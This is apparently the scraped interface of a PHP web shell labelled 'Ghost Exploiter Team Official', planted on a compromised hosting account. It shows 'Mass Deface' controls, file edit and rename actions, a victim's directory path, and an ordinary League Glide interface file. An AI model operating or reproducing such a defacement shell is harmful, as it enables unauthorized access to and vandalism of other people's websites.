webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
league
/
glide
/
src
/
Responses
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
PsrResponseFactory.php
1.675KB
edt
ren
ResponseFactoryInterfac
...
0.389KB
edt
ren
<?php namespace League\Glide\Responses; use League\Flysystem\FilesystemOperator; interface ResponseFactoryInterface { /** * Create response. * * @param FilesystemOperator $cache Cache file system. * @param string $path Cached file path. * * @return mixed The response object. */ public function create(FilesystemOperator $cache, $path); }